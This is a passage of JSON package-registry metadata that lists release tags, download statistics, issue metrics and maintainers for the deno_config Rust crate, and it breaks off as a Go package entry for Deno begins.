"dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.16.4/manifests"},{"name":"0.16.3","sha":"92194b1e2bb132f4e1e8865d71e2bec4f3d497d1","kind":"commit","published_at":"2024-04-30T09:26:37.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.16.3","html_url":"https://github.com/denoland/deno_config/releases/tag/0.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.16.3/manifests"},{"name":"0.16.2","sha":"9732b3cb7d23764c5b7dda6a0eca580c6ab25c53","kind":"commit","published_at":"2024-04-29T15:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.16.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.16.2/manifests"},{"name":"0.16.1","sha":"8a0319696354a2ff9cf0f270cee0263a047ffa7c","kind":"commit","published_at":"2024-04-21T00:09:44.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.16.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.16.1/manifests"},{"name":"0.16.0","sha":"b2fc3912d43439139cad9d3e16a52de85cb668d6","kind":"commit","published_at":"2024-04-19T14:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.16.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"2aa69583670578ca2a8cf7d02d93c12f5e9fad19","kind":"commit","published_at":"2024-03-27T19:47:46.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.15.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.15.0/manifests"},{"name":"0.14.1","sha":"dfe4eaa4cb2d15f3c15d314954470fb096aa781f","kind":"commit","published_at":"2024-03-07T21:34:45.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.14.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.14.1/manifests"},{"name":"0.14.0","sha":"375fcf87f8226afa5bed08ed81d39cc5c59d20b3","kind":"commit","published_at":"2024-03-07T17:19:43.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.14.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.14.0/manifests"},{"name":"0.13.0","sha":"31b852c7dd9846dab332b6d4baf74616933a5c2d","kind":"commit","published_at":"2024-03-06T23:04:39.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.13.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"491d00c7bbe260eee372b7dda0f8d2b0e9528659","kind":"commit","published_at":"2024-02-26T15:40:37.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.12.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"fbd59c999287986f2b885e1ee53c55df9de15f6a","kind":"commit","published_at":"2024-02-23T19:00:31.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.11.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.11.0/manifests"},{"name":"0.10.0","sha":"697ef2d4f7b3014ac1ee075bd9a0fac345f23ca3","kind":"commit","published_at":"2024-02-15T23:23:31.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.10.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.10.0/manifests"},{"name":"0.9.2","sha":"a302cec7247e2f197c4422008494468ba93b6a84","kind":"commit","published_at":"2024-02-02T22:34:53.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.9.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"e881c2e2b85bc514fd82c522c11863969e8420af","kind":"commit","published_at":"2024-01-24T13:50:49.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.9.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.9.1/manifests"},{"name":"0.9.0","sha":"5c786d071d708f0a0de10721d540eca99de7f9e2","kind":"commit","published_at":"2024-01-24T13:48:57.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.9.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.9.0/manifests"},{"name":"0.8.2","sha":"29e3ae98e884086be51f3156be6ef3b2548edfd2","kind":"commit","published_at":"2024-01-23T20:20:00.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.8.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.8.2/manifests"},{"name":"0.8.1","sha":"ae584c7ad35d3f5b32e390fed8ca5ea9fec1e3f1","kind":"commit","published_at":"2024-01-21T21:32:02.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.8.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.8.1/manifests"},{"name":"0.8.0","sha":"95e46b4d57fa8a4bf89bd41922171d87a30d29d1","kind":"commit","published_at":"2024-01-17T21:30:32.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.8.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.8.0/manifests"},{"name":"0.7.1","sha":"1021648a3aeedab5ccf5f5b0e98e24f193d532e8","kind":"commit","published_at":"2024-01-15T22:00:11.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.7.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.7.1/manifests"},{"name":"0.7.0","sha":"b29207cbee6d3669714f3c3537378b656235d29a","kind":"commit","published_at":"2024-01-15T19:57:45.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.7.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.7.0/manifests"},{"name":"0.6.5","sha":"c9091cba922b602ff89e9465672e532dd6b874a1","kind":"commit","published_at":"2023-11-24T17:08:35.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.6.5","html_url":"https://github.com/denoland/deno_config/releases/tag/0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.5/manifests"},{"name":"0.6.4","sha":"64d66b5730f06d9fc5c2dd3c77a29e2c56b7fc59","kind":"commit","published_at":"2023-11-17T00:25:46.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.6.4","html_url":"https://github.com/denoland/deno_config/releases/tag/0.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.4/manifests"},{"name":"0.6.3","sha":"7790998ee7acdad87f73e4cde26d3384b2cbed0f","kind":"commit","published_at":"2023-11-16T22:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.6.3","html_url":"https://github.com/denoland/deno_config/releases/tag/0.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.3/manifests"},{"name":"0.6.2","sha":"cc5cde3ec7491a2d49b88eb218c6bd42303eaab2","kind":"commit","published_at":"2023-11-15T22:23:12.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.6.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.2/manifests"},{"name":"0.6.1","sha":"afe07ac0fe3e8ee5a8fc6bbf6b57800ec1a8fc3f","kind":"commit","published_at":"2023-11-10T22:50:35.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.6.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.1/manifests"},{"name":"0.6.0","sha":"8e1d2fe283dc9a32ad894907715b1ee284156508","kind":"commit","published_at":"2023-11-10T15:14:46.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.6.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.6.0/manifests"},{"name":"0.5.0","sha":"ae8adebb4fd49a0d5ccf16794834f4ea8e4adde2","kind":"commit","published_at":"2023-10-31T15:23:30.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.5.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"e3e13e526adaf66ca7c1041e51773f8c01a8f0f2","kind":"commit","published_at":"2023-10-05T10:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.4.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.4.0/manifests"},{"name":"0.3.1","sha":"453094beb8c4df71bca43e4ae1ce87c7008daab2","kind":"tag","published_at":"2023-09-09T17:17:31.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.3.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"bb552f17b91497ef40ad6569556d25804f856381","kind":"tag","published_at":"2023-09-07T20:18:39.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.3.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.3.0/manifests"},{"name":"0.2.4","sha":"2c2ab6d662fff3d991a17ea52b8aa73aa0059be4","kind":"commit","published_at":"2023-09-01T13:31:00.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.2.4","html_url":"https://github.com/denoland/deno_config/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"3f15d28a67084e84b29ee33cfac8fdf9ec2bbeed","kind":"commit","published_at":"2023-09-01T12:13:56.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.2.3","html_url":"https://github.com/denoland/deno_config/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"5142a98b569d1cdab103fcac6a84e46f2dba2816","kind":"commit","published_at":"2023-09-01T09:57:53.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.2.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.2.2/manifests"},{"name":"0.2.0","sha":"554fb308a1ccd9bf99fd72dd10cf59d32c5c5191","kind":"commit","published_at":"2023-08-24T07:36:12.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.2.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-08-22T18:49:42.033Z","dependent_packages_count":1,"downloads":799014,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":12.675918391947686,"dependent_repos_count":13.275356639562311,"dependent_packages_count":18.1541406361862,"stargazers_count":30.090557444787102,"forks_count":18.609789387164156,"docker_downloads_count":null,"average":18.56115249992949},"purl":"pkg:cargo/deno_config","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_config","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_config","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_config/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-08-23T14:10:43.387Z","updated_at":"2023-08-23T14:10:43.387Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-08-24T21:59:00.131Z","updated_at":"2023-08-24T21:59:00.131Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14854700,"name":"github.com/Denoland/deno","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/Denoland/deno","keywords_array":[],"namespace":null,"versions_count":250,"first_release_published_at":"2020-08-13T16:10:13.000Z","latest_release_published_at":"2026-08-27T15:15:58.000Z","latest_release_number":"v2.9.6+incompatible","last_synced_at":"2026-08-29T21:57:05.788Z","created_at":"2026-08-02T09:00:18.340Z","updated_at":"2026-08-29T21:57:05.788Z","registry_url":"https://pkg.go.dev/github.com/Denoland/deno","install_command":"